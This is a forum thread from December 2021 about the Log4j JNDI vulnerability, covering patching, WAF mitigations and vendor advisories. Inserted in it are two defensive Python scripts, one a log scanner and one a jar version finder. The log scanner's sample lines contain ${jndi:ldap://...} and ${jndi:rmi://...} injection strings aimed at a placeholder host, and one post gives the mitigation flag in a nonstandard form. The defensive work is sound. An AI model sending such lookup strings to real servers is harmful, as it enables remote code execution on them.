Log4j zero day just dropped https://twitter.com/campuscodi/status/1469276512847339521?s=20

# Dec 10, 2021 13:44

Just in time for everyone to have to justify an emergency patch during their company's holiday code/production change/etc freeze period.

# Dec 10, 2021 13:52

We have also been dealing with this at work. Coworker has been testing servers with this python script, but hasn't gotten a hit yet. https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6 Either the servers are using Log4j 1.x, or they are using OpenJDK from RHEL or Ubuntu which have partially mitigated this years ago with CVE-2018-3149.

# Dec 10, 2021 13:57

imagine having a job where you aren't terrified of looking at your news feed to see what fresh hell awaits you

# Dec 10, 2021 14:08

There's now speculation that Log4j 1.x is also vulnerable. And it's of course also EOL'd and won't receive updates. https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126

# Dec 10, 2021 14:17

As a really simple customer-facing mitigation, is payload inspection at a WAF a possible emergency workaround if the concern is arbitrary user input (focusing on jndi), or am I really naive here? Not enough caffeine and I'm still waking up.

# Dec 10, 2021 14:29

Martytoof posted: "As a really simple customer-facing mitigation, is payload inspection at a WAF a possible emergency workaround if the concern is arbitrary user input (focusing on jndi), or am I really naive here? Not enough caffeine and I'm still waking up."

Cloudflare has released some stuff as a workaround, so yes. Also there's mitigation such as adding a Java runtime argument that helps prevent it: https://twitter.com/_JohnHammond/status/1469255402290401285?s=20 https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/

If you are running anything Java like Minecraft, add this to your Java args until you can update/patch: +log4j2.formatmsgnolookups=true

CommieGIR fucked around with this message at 15:03 on Dec 10, 2021

# Dec 10, 2021 14:50

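The WAF payload-inspection idea discussed above works at the edge, but the same string check is just as useful run over your own access logs to see who has been probing. The script below is an added example written for this thread, not code from any poster or from Cloudflare; the log lines are constructed samples in combined log format, and the field names (request, referer, ua) and the `scheme`/`target` split of the lookup string are the example's own assumptions.

```python
"""Added example (not from the thread): scan web access logs for the
log4j ${jndi:...} lookup string.  The log lines below are constructed
samples in combined log format, not real traffic."""
import re

# Constructed sample lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:14:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:14:01:07 +0000] "GET /login HTTP/1.1" 404 0 "-" "${jndi:ldap://scanner.example.invalid:1389/a}"
10.0.0.9 - - [10/Dec/2021:14:01:09 +0000] "GET /?q=${JNDI:rmi://scanner.example.invalid/b} HTTP/1.1" 200 77 "-" "curl/7.79"
10.0.0.12 - - [10/Dec/2021:14:02:00 +0000] "POST /api HTTP/1.1" 200 10 "https://ref.example.invalid/" "Mozilla/5.0"
"""

# Fields of the combined log format that we attribute a hit to.  Anything
# the application logs (request line, Referer, User-Agent) is a candidate,
# because log4j performs the lookup on the logged string, not on a specific field.
_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# The lookup itself: ${jndi:<scheme>:<target>}, matched case-insensitively.
_JNDI = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+):(?P<target>[^}]*)\}", re.IGNORECASE)


def find_jndi_lookups(log_text):
    """Return one record per logged field that carries a JNDI lookup string."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = _LINE.match(line)
        if not m:
            continue  # unparseable line; a production scanner should count these
        for field in ("request", "referer", "ua"):
            for j in _JNDI.finditer(m.group(field)):
                hits.append({
                    "line": lineno,
                    "src": m.group("src"),
                    "field": field,
                    "scheme": j.group("scheme").lower(),
                    "target": j.group("target"),
                })
    return hits


def sources_to_review(log_text):
    """Distinct client addresses that sent a lookup string, for triage."""
    return sorted({h["src"] for h in find_jndi_lookups(log_text)})


if __name__ == "__main__":
    for h in find_jndi_lookups(SAMPLE_LOG):
        print(h)
    print("review:", sources_to_review(SAMPLE_LOG))
```

A hit in the log only tells you that a probe arrived and was written to disk; whether the lookup actually fired depends on the log4j version and configuration of the application that logged it, which is why the runtime flag and patching advice in the thread still applies regardless of what the WAF catches.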
CommieGIR posted: "If you are running anything Java like Minecraft, add this to your Java args until you can update/patch: +log4j2.formatmsgnolookups=true"

According to the article, that's all the latest patch does anyway.

quote: "According to p0rz9, the Chinese security researcher who first posted the exploit code online, CVE-2021-44228 can only be abused if the log4j2.formatMsgNoLookups option in the library's configuration is set to false."

# Dec 10, 2021 15:51

Proteus Jones posted: "According to the article, that's all the latest patch does anyway."

Lol, gotta love simple fixes

# Dec 10, 2021 16:03

Proteus Jones posted: "According to the article, that's all the latest patch does anyway."

The diff looks to be a mite more thorough than just that: https://issues.apache.org/jira/browse/LOG4J2-3201. Looks like you'd have to change quite a few settings.

# Dec 10, 2021 16:24

Already seeing active attempts at exploitation and had to patch at least 1 public facing device. Always on a Friday or a holiday.

# Dec 10, 2021 17:49

We still aren't done patching the last CVE

# Dec 10, 2021 18:52

Well well well, if it isn't the consequences of our own actions. Sure glad we have no real way to monitor for this vulnerability.

# Dec 10, 2021 20:15

Just enable more logg-ohhhhh

# Dec 10, 2021 20:35

my thread title still stands

# Dec 10, 2021 20:55

I'm so tired

# Dec 10, 2021 21:05

Cup Runneth Over posted: "I'm so tired"

# Dec 10, 2021 21:12

https://twitter.com/brianloveswords/status/1469358777409454092

# Dec 10, 2021 22:15

FYI Panorama actually uses log4j, but firewall PAN-OS does not - https://docs.paloaltonetworks.com/oss-listings/panorama-oss-listings/panorama-9-1-open-source-software-oss-listing.html https://docs.paloaltonetworks.com/oss-listings/pan-os-oss-listings/pan-os-9-1-open-source-software-oss-listing.html. PAN just released a security advisory that they're investigating whether or not Panorama is affected https://security.paloaltonetworks.com/CVE-2021-44228

# Dec 10, 2021 23:32

How many shops are having this conversation right now: "Can anyone tell me how vulnerable we are to log4j? -> can anyone tell me how many apps run on java? -> can anyone tell me how many servers we have???"

# Dec 10, 2021 23:55

Martytoof posted: "How many shops are having this conversation right now:"

I feel like the jump from a->b is taking a lot longer than people are willing to talk about.

# Dec 11, 2021 00:02

Elastic and logstash: https://github.com/elastic/elasticsearch/issues/81618#issuecomment-991000240

# Dec 11, 2021 00:03

rafikki posted: "FYI Panorama actually uses log4j, but firewall PAN-OS does not - https://docs.paloaltonetworks.com/oss-listings/panorama-oss-listings/panorama-9-1-open-source-software-oss-listing.html https://docs.paloaltonetworks.com/oss-listings/pan-os-oss-listings/pan-os-9-1-open-source-software-oss-listing.html. PAN just released a security advisory that they're investigating whether or not Panorama is affected https://security.paloaltonetworks.com/CVE-2021-44228"

Meanwhile Prisma Cloud Compute (Twistlock) still can't track this CVE, would have been real easy to figure out our exposure if this was working.

# Dec 11, 2021 00:17

I'm imagining two or more APTs fighting for dominance inside a clueless organization for the next 6 months and it's pretty much the only thing making me smile right now.

# Dec 11, 2021 00:50

One of our team members found out that running curl against our Powerschool SIS servers, intentionally generating a 404, and setting the jndi string in the request header triggered our canary token. So yeah, our division took the SIS off the internet and we're awaiting Powerschool's response.

# Dec 11, 2021 00:57

Should I care if I don't run any Java?

# Dec 11, 2021 01:18

You may have vendors who do, so generally yes

# Dec 11, 2021 01:20

I don't mean like should my company care, but is there something I personally should be doing differently, at home, as someone who isn't running Java.

# Dec 11, 2021 01:27

(IMO) You, personally, are a minor target at best. Unless your neighbour really hates you and wants to gently caress with your WiFi by doing the device-name-RCE thing you are probably fine. Stay up to date on vendor patches for your internet connected garbage. If you run a DMZ network on your home LAN then understand what you are exposing and make sure it's patched. Maybe more serious if you have an Android phone I suppose?

# Dec 11, 2021 01:51

Absurd Alhazred posted: "I don't mean like should my company care, but is there something I personally should be doing differently, at home, as someone who isn't running Java."

Honest question, how do you know you're not running Java?

# Dec 11, 2021 01:56

If you have anything public facing/accessible it doesn’t hurt to check product pages for patches. I’ve been seeing opportunistic scanning/attempts all day to anything with an ipv4 address, not unlike the exchange stuff earlier in the year. log4j is ubiquitous and the exploit is trivial

# Dec 11, 2021 01:58

So minor update: If you are on less than version 2.10 of Log4j, the Java exec mitigation won't work. You gotta patch. Found that out in a VM today. And VMware was affected by this: https://www.vmware.com/security/advisories/VMSA-2021-0028.html?cid=70134000001YTvO&src=so_5b27ee4a667bd

# Dec 11, 2021 02:02

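Two questions in this thread, "how do you know you're not running Java?" and "below 2.10 the runtime flag won't work, you gotta patch", both come down to finding every log4j-core jar on a box and reading its version, including jars buried inside wars and ears. The script below is an added example written for this thread, not any poster's tool and not an Apache artefact; the demo jars it builds are constructed stand-ins that only carry the Maven pom.properties and class-file paths a real log4j-core jar contains. The version thresholds in `classify` follow the thread's advice (flag honoured from 2.10, lookup disabled by default from 2.15.0); always defer to your vendor's current release.

```python
"""Added example (not from the thread): walk a directory tree, find
log4j-core jars (including jars nested inside wars/ears/jars) and report
which mitigation applies to each version.  The demo jars are constructed
stand-ins, not real log4j artefacts."""
import io
import os
import re
import tempfile
import zipfile

# Real paths found inside log4j-core / log4j 1.x jars.
POM_RE = re.compile(r"^META-INF/maven/org\.apache\.logging\.log4j/log4j-core/pom\.properties$")
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
LOG4J1_CLASS = "org/apache/log4j/Logger.class"
ARCHIVES = (".jar", ".war", ".ear")


def parse_version(s):
    """'2.14.1' -> (2, 14, 1); tolerates suffixes such as '2.0-beta9'."""
    return tuple(int(x) for x in re.findall(r"\d+", s)[:3]) or (0,)


def classify(version, has_jndi_lookup):
    """Map a log4j version to the advice discussed in the thread."""
    v = parse_version(version)
    if v < (2,):
        return "log4j 1.x: EOL, no formatMsgNoLookups option; follow vendor guidance"
    if v >= (2, 15):
        return "2.15.0+: JNDI lookup disabled by default; keep to vendor's current release"
    if v < (2, 10):
        return "below 2.10: -Dlog4j2.formatMsgNoLookups=true is NOT honoured; patch required"
    if not has_jndi_lookup:
        return "2.10-2.14.x with JndiLookup class removed"
    return "2.10-2.14.x: -Dlog4j2.formatMsgNoLookups=true works as a stopgap until patched"


def inspect_jar_bytes(data, path):
    """Yield findings for one archive, recursing into nested archives."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return  # not a zip (e.g. a corrupt or renamed file): nothing to report
    names = set(zf.namelist())
    version = None
    for n in names:
        if POM_RE.match(n):
            props = zf.read(n).decode("utf-8", "replace")
            m = re.search(r"^version=(.+)$", props, re.MULTILINE)
            if m:
                version = m.group(1).strip()
    if version is None and LOG4J1_CLASS in names:
        version = "1.x"
    if version is not None:
        yield {"path": path, "version": version,
               "advice": classify(version, JNDI_CLASS in names)}
    for n in names:
        if n.lower().endswith(ARCHIVES):
            yield from inspect_jar_bytes(zf.read(n), f"{path}!{n}")


def scan_tree(root):
    """Return findings for every archive under root."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVES):
                p = os.path.join(dirpath, f)
                with open(p, "rb") as fh:
                    findings.extend(inspect_jar_bytes(fh.read(), p))
    return findings


# --- constructed demo fixtures (stand-ins, not real log4j jars) ---
def _fake_log4j_core(version, with_jndi=True):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties",
                   f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        if with_jndi:
            z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder class bytes
    return buf.getvalue()


def build_demo_tree():
    """Temp dir with an old bare jar and a war bundling a 2.14.x jar."""
    root = tempfile.mkdtemp(prefix="log4jscan-")
    with open(os.path.join(root, "log4j-core-2.8.2.jar"), "wb") as f:
        f.write(_fake_log4j_core("2.8.2"))
    app = io.BytesIO()
    with zipfile.ZipFile(app, "w") as z:
        z.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", _fake_log4j_core("2.14.1"))
        z.writestr("WEB-INF/lib/other-lib.jar", b"not a zip")
    with open(os.path.join(root, "app.war"), "wb") as f:
        f.write(app.getvalue())
    return root


if __name__ == "__main__":
    for finding in scan_tree(build_demo_tree()):
        print(finding)
```

Point `scan_tree` at `/` (or wherever your application servers keep their deployments) instead of the demo tree; the nested-archive recursion is what catches the copies of log4j that never show up in Add/Remove Programs or a package manager because a vendor bundled them inside their own war.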
Martytoof posted: "Maybe more serious if you have an Android phone I suppose?"

Oh, dear, yeah, I do have an Android, I hadn't even thought of that.

Fart Amplifier posted: "Honest question, how do you know you're not running Java?"

Aside from the Android I forgot had Java in it, I never installed Java on this computer.

# Dec 11, 2021 02:35

I mean I'm not saying there's anything identified that is going on with Android right this second, just in my mind a phone that basically runs Java and interacts with the world is probably something to keep an eye on right now.

# Dec 11, 2021 02:37

Absurd Alhazred posted: "Aside from the Android I forgot had Java in it, I never installed Java on this computer."

And you're sure you haven't installed anything that bundles it?

# Dec 11, 2021 02:55

Fart Amplifier posted: "And you're sure you haven't installed anything that bundles it?"

I'm pretty sure? How would I check?

# Dec 11, 2021 03:35

Absurd Alhazred posted: "I'm pretty sure? How would I check?"

- Every company's infrastructure team with hands on servers on December 10 2021

# Dec 11, 2021 03:43

Martytoof posted: "- Every company's infrastructure team with hands on servers on December 10 2021"

I mean, I looked at Add/Remove programs, I've searched my disk, I don't have java or jre anywhere. Am I missing something?

# Dec 11, 2021 03:53

No, I'm being sarcastic. Sorry, it's been a long long day.

# Dec 11, 2021 03:55

No worries, and I imagine!

# Dec 11, 2021 03:58